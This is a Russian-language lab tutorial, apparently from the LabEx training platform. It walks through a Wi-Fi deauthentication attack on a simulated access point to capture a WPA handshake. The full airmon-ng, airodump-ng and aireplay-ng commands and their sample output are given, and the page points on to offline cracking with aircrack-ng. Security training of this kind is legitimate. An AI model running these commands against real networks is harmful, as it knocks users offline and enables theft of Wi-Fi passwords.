LabEx
ВходРегистрация

Принудительный захват WPA Handshake с помощью атаки деаутентификации aireplay-ng

Beginner
Практиковаться сейчас

Введение

Добро пожаловать в эту лабораторную работу по принудительному захвату WPA handshake. Четырехстороннее рукопожатие WPA/WPA2 является критически важным фрагментом данных, необходимым для попытки взлома пароля сети Wi-Fi. Хотя вы можете пассивно ждать, пока устройство подключится к сети, чтобы захватить это рукопожатие, это может занять много времени.

Более активный подход заключается в принудительном отключении уже подключенного клиента и его немедленном повторном подключении. Этот процесс называется атакой деаутентификации (или "deauth"). Когда клиент повторно подключается, он выполняет четырехстороннее рукопожатие, которое вы затем можете захватить.

В этой лабораторной работе вы будете использовать aireplay-ng, мощный инструмент из набора aircrack-ng, для выполнения атаки деаутентификации на симулированный клиент Wi-Fi. Это позволит вам надежно захватить WPA handshake для анализа. Наша лабораторная среда была предварительно настроена с виртуальной точкой доступа беспроводной сети (AP) с именем MyTestAP и подключенным клиентом.

Определение ассоциированного клиента по сканированию airodump-ng

На этом шаге вы подготовите ваш беспроводной интерфейс для мониторинга, а затем используете airodump-ng для поиска целевой точки доступа и подключенного к ней клиента.

Сначала вам нужно перевести один из ваших виртуальных беспроводных интерфейсов в режим мониторинга. Этот режим позволяет интерфейсу захватывать весь трафик Wi-Fi в эфире, а не только тот, который предназначен для него. Мы будем использовать интерфейс wlan1.

Выполните следующую команду, чтобы запустить режим мониторинга на wlan1:

sudo airmon-ng start wlan1

Эта команда создаст новый интерфейс мониторинга, обычно называемый wlan1mon. Вы увидите вывод, подтверждающий, что режим был включен.

PHY     Interface       Driver          Chipset

phy0    wlan0           mac80211_hwsim  Software simulator
phy1    wlan1           mac80211_hwsim  Software simulator

                (mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
                (mac80211 station mode vif disabled for [phy1]wlan1)

Теперь запустите airodump-ng на новом интерфейсе мониторинга (wlan1mon), чтобы начать сканирование. Мы будем использовать флаг -w для записи захваченных пакетов в файл с именем capture, и укажем BSSID и канал нашей целевой AP для фокусировки сканирования. BSSID для нашей симулированной AP — 02:00:00:00:01:00, и она находится на канале 6.

sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon

Пусть airodump-ng работает. Вы увидите экран, который обновляется в реальном времени. Верхняя часть списка содержит ближайшие точки доступа, а нижняя часть — клиентов, подключенных к ним. Вы должны увидеть нашу AP, MyTestAP, и одного клиента, подключенного к ней.

Вывод будет выглядеть примерно так:

CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       10        5    0   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -35    0- 1      0        5

Из этого вывода определите и запишите:

  • BSSID: 02:00:00:00:01:00 (MAC-адрес AP).
  • STATION: 02:00:00:00:02:00 (MAC-адрес подключенного клиента).

Оставьте этот терминал запущенным. Он вам понадобится для подтверждения захвата рукопожатия позже.

Открытие нового терминала для атаки деаутентификации

На этом шаге вы откроете новое окно терминала. Команда airodump-ng из предыдущего шага должна продолжать работать в первом терминале для прослушивания WPA handshake. Атака деаутентификации будет запущена из второго, отдельного терминала.

Чтобы открыть новый терминал, нажмите значок + на панели вкладок терминала в верхней части окна терминала.

Open New Terminal

После открытия нового терминала вы окажетесь в каталоге ~/project, готовые выполнить команду атаки на следующем шаге. Все последующие команды для самой атаки должны выполняться в этом новом терминале.

Формирование команды aireplay-ng Deauth с флагом --deauth

На этом шаге вы сформируете команду aireplay-ng, которая выполнит атаку деаутентификации. Вы будете использовать информацию, собранную на Шаге 1.

Базовый синтаксис для атаки деаутентификации с помощью aireplay-ng следующий:
aireplay-ng --deauth <количество_пакетов> -a <BSSID_AP> -c <STATION_клиента> <интерфейс>

Разберем компоненты:

  • --deauth: Этот флаг указывает режим атаки деаутентификации.
  • <количество_пакетов>: Это количество отправляемых пакетов деаутентификации. Отправка небольшой серии, например 5, обычно достаточна для отключения клиента.
  • -a <BSSID_AP>: Указывает MAC-адрес целевой точки доступа. Из Шага 1, это 02:00:00:00:01:00.
  • -c <STATION_клиента>: Указывает MAC-адрес клиента, которого вы хотите отключить. Из Шага 1, это 02:00:00:00:02:00.
  • <интерфейс>: Это ваш беспроводной интерфейс в режиме мониторинга, то есть wlan1mon.

Теперь соберите полную команду в вашем новом терминале. Она должна выглядеть точно так:

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

Пока не нажимайте Enter. На следующем шаге вы выполните эту команду.

Выполнение атаки на клиента и точку доступа

На этом шаге вы выполните только что сконструированную команду для запуска атаки.

Во втором окне терминала нажмите Enter, чтобы запустить команду aireplay-ng.

sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon

Инструмент немедленно начнет отправлять пакеты деаутентификации. В выводе будет показано время и информация о том, что отправляются направленные пакеты деаутентификации клиенту.

Вывод будет выглядеть следующим образом:

10:35:10  Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11  Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...

Атака происходит очень быстро. Как только вы выполните команду, целевой клиент будет отключен от сети и немедленно попытается переподключиться. Этот процесс переподключения генерирует WPA handshake, который мы хотим захватить.

Быстро вернитесь к первому терминалу (тому, где запущена airodump-ng), чтобы наблюдать результат на следующем шаге.

Подтверждение захвата рукопожатия в окне airodump-ng

На этом шаге вы подтвердите успешность атаки деаутентификации, проверив сообщение WPA handshake в окне airodump-ng.

Вернитесь к первому терминалу. Если атака прошла успешно, в правом верхнем углу дисплея airodump-ng вы увидите новое сообщение:

WPA handshake: 02:00:00:00:01:00

Это сообщение подтверждает, что airodump-ng успешно перехватил и записал четырехстороннее рукопожатие для указанного BSSID.

CH  6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 02:00:00:00:01:00  -30       48       82    1   6  540  WPA2 CCMP   PSK  MyTestAP

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 02:00:00:00:01:00  02:00:00:00:02:00  -36    0- 1      0       75

Теперь, когда у вас есть рукопожатие, вы можете остановить захват. Нажмите Ctrl+C в терминале airodump-ng, чтобы остановить его.

Поскольку вы использовали флаг -w capture на Шаге 1, airodump-ng сохранил захваченный трафик в файлы в текущем каталоге (~/project). Выведите список файлов, чтобы увидеть результаты.

ls -l

Вы должны увидеть несколько файлов, начинающихся с capture, включая capture-01.cap. Этот файл .cap содержит необработанные данные пакетов, включая только что захваченное вами WPA handshake.

-rw-r--r-- 1 root  root    450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root  root    892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root  root    634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root  root    128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex   121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex    52 Oct 27 10:28 wpa_supplicant.conf

Файл capture-01.cap является главным призом. Теперь его можно использовать с инструментами для подбора паролей, такими как aircrack-ng, чтобы попытаться обнаружить общий ключ сети (pre-shared key).

Итоги

Поздравляем с завершением этой лабораторной работы! Вы успешно выполнили атаку деаутентификации для принудительного захвата WPA handshake.

В этой лабораторной работе вы научились:

  • Переводить беспроводной интерфейс в режим мониторинга с помощью airmon-ng.
  • Сканировать и идентифицировать целевую точку доступа (AP) и клиента с помощью airodump-ng.
  • Конструировать и выполнять атаку деаутентификации с помощью aireplay-ng.
  • Подтверждать захват WPA handshake и находить соответствующий файл .cap.

Это фундаментальный навык в тестировании безопасности беспроводных сетей. Файл захваченного рукопожатия является ключевым компонентом для следующего этапа: офлайн-взлом пароля с использованием таких инструментов, как aircrack-ng, и подробного списка слов (wordlist).